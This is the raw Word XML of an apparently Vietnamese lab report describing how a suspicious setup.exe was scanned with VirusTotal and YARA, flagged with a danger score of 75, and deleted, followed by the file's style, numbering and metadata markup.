          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả file đã được xóa khỏi máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD52326" w14:textId="36390E32" w:rsidR="008755FE" w:rsidRDefault="008755FE" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ta quét tương tự với file setup.exe</w:t>
      </w:r>
      <w:r w:rsidR="00B73544">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE617BD" w14:textId="40F094B6" w:rsidR="00BD0059" w:rsidRDefault="00BD0059" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6885D75E" wp14:editId="7A7B38D7">
            <wp:extent cx="5733415" cy="3281680"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="180952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0578" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3281680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDAA83" w14:textId="4E913446" w:rsidR="00F027C9" w:rsidRDefault="00F027C9" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sử dụng VirusTotal để quét và đã phát hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9ED7F" w14:textId="6F7250E6" w:rsidR="00E93930" w:rsidRDefault="00E93930" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F967614" wp14:editId="66DB37E0">
            <wp:extent cx="5733415" cy="3369310"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="82132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25919" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3369310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA22043" w14:textId="77777777" w:rsidR="009151C0" w:rsidRDefault="009151C0" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2F77E0" w14:textId="77777777" w:rsidR="009151C0" w:rsidRDefault="009151C0" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAD3056" w14:textId="7A8CEF5A" w:rsidR="009151C0" w:rsidRDefault="009151C0" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng YARA để quét và phát hiện ra mã độc, điểm </w:t>
      </w:r>
      <w:r w:rsidR="00836BF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đánh giá mức độ nguy hiểm của mã độ này là 75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7D33B8" w14:textId="41D0B410" w:rsidR="00FE3CF5" w:rsidRDefault="00FE3CF5" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E98908B" wp14:editId="4197262F">
            <wp:extent cx="5733415" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="123962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1786" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId51"/>
                    <a:srcRect b="17526"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2743200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C58D56" w14:textId="503A8BAD" w:rsidR="00F07F42" w:rsidRDefault="00F07F42" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau đó Click xóa file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E66EF" w14:textId="304256AB" w:rsidR="00F07F42" w:rsidRDefault="00F07F42" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả file đã được xóa khỏi máy t</w:t>
      </w:r>
      <w:r w:rsidR="00680AEF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94038A" w14:textId="7F7091DC" w:rsidR="009C6F75" w:rsidRPr="00245C95" w:rsidRDefault="0028339E" w:rsidP="009A17C6">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AEA56FF" wp14:editId="44D76D02">
            <wp:extent cx="5733415" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="141433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0620" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1351915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C6F75" w:rsidRPr="00245C95">
      <w:footerReference w:type="default" r:id="rId5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74E8" w14:textId="77777777" w:rsidR="00AA33ED" w:rsidRDefault="00AA33ED" w:rsidP="00826669">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04C90EF1" w14:textId="77777777" w:rsidR="00AA33ED" w:rsidRDefault="00AA33ED" w:rsidP="00826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764615"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="4594B931" w14:textId="257575C1" w:rsidR="00B24CA2" w:rsidRDefault="00B24C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ABC3D" w14:textId="77777777" w:rsidR="00B24CA2" w:rsidRDefault="00B2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4731" w14:textId="77777777" w:rsidR="00AA33ED" w:rsidRDefault="00AA33ED" w:rsidP="00826669">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12A97F38" w14:textId="77777777" w:rsidR="00AA33ED" w:rsidRDefault="00AA33ED" w:rsidP="008266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5977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1CAE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19074D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D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37D7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4676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A4932"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FCEA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6B13EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86C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53E56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D3C6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176F4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF86E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F63DE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17E27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A61261"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B098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D10BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="202ED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9224EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E10C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1223F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63AAD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903FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B3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D44C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C05A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B0302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B0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119444">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="570583829">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1671330917">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1776972930">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1823041195">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1428697634">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="280578668">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="701634397">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="937445909">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="358892918">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1682968607">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1924488418">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1215431490">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1561284955">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1333681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18"/>
    <w:rsid w:val="0001081B"/>
    <w:rsid w:val="000A2B04"/>
    <w:rsid w:val="000F591E"/>
    <w:rsid w:val="00154862"/>
    <w:rsid w:val="00184AFC"/>
    <w:rsid w:val="00195CA8"/>
    <w:rsid w:val="001C6BBB"/>
    <w:rsid w:val="00234B30"/>
    <w:rsid w:val="00234F56"/>
    <w:rsid w:val="00245C95"/>
    <w:rsid w:val="00272432"/>
    <w:rsid w:val="0028339E"/>
    <w:rsid w:val="00403FAC"/>
    <w:rsid w:val="004544C9"/>
    <w:rsid w:val="004B18B1"/>
    <w:rsid w:val="004C1AA4"/>
    <w:rsid w:val="004C549D"/>
    <w:rsid w:val="00553CD8"/>
    <w:rsid w:val="00663C4C"/>
    <w:rsid w:val="00680AEF"/>
    <w:rsid w:val="006B08DF"/>
    <w:rsid w:val="006C3CFB"/>
    <w:rsid w:val="006C7EC4"/>
    <w:rsid w:val="00717B9C"/>
    <w:rsid w:val="00755185"/>
    <w:rsid w:val="007C3349"/>
    <w:rsid w:val="007D0995"/>
    <w:rsid w:val="00826669"/>
    <w:rsid w:val="00836BF5"/>
    <w:rsid w:val="008755FE"/>
    <w:rsid w:val="008826E1"/>
    <w:rsid w:val="009054E6"/>
    <w:rsid w:val="00913E01"/>
    <w:rsid w:val="009151C0"/>
    <w:rsid w:val="00947F5D"/>
    <w:rsid w:val="00951BD3"/>
    <w:rsid w:val="009A0B17"/>
    <w:rsid w:val="009A17C6"/>
    <w:rsid w:val="009B296F"/>
    <w:rsid w:val="009B4847"/>
    <w:rsid w:val="009C6F75"/>
    <w:rsid w:val="009D110C"/>
    <w:rsid w:val="009E17F2"/>
    <w:rsid w:val="00A14753"/>
    <w:rsid w:val="00A537A0"/>
    <w:rsid w:val="00A8142C"/>
    <w:rsid w:val="00AA33ED"/>
    <w:rsid w:val="00B24CA2"/>
    <w:rsid w:val="00B73544"/>
    <w:rsid w:val="00B83F29"/>
    <w:rsid w:val="00BA604D"/>
    <w:rsid w:val="00BD0059"/>
    <w:rsid w:val="00C41018"/>
    <w:rsid w:val="00CB2244"/>
    <w:rsid w:val="00CC3C04"/>
    <w:rsid w:val="00D51949"/>
    <w:rsid w:val="00D54EAA"/>
    <w:rsid w:val="00D63EBF"/>
    <w:rsid w:val="00DA7D9C"/>
    <w:rsid w:val="00E30FB4"/>
    <w:rsid w:val="00E93930"/>
    <w:rsid w:val="00EA0FA7"/>
    <w:rsid w:val="00EA1BA1"/>
    <w:rsid w:val="00EE0876"/>
    <w:rsid w:val="00EE234B"/>
    <w:rsid w:val="00F027C9"/>
    <w:rsid w:val="00F07F42"/>
    <w:rsid w:val="00F35779"/>
    <w:rsid w:val="00FA05A9"/>
    <w:rsid w:val="00FA3C20"/>
    <w:rsid w:val="00FE3C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6B8B"/>
  <w15:docId w15:val="{C45CFB52-2F3E-4832-950D-4064AFF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717B9C"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00717B9C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00154862"/>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154862"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006B08DF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00826669"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00826669"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00826669"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00826669"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0082666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826669"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008266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3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virustotal.com/gui/home/upload" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatures" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.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en.wikipedia.org/wiki/Portable_Executabl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629C-18CE-4596-8857-DDC0D512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4</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ên Hoàng Trung</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-28T01:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-13T02:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>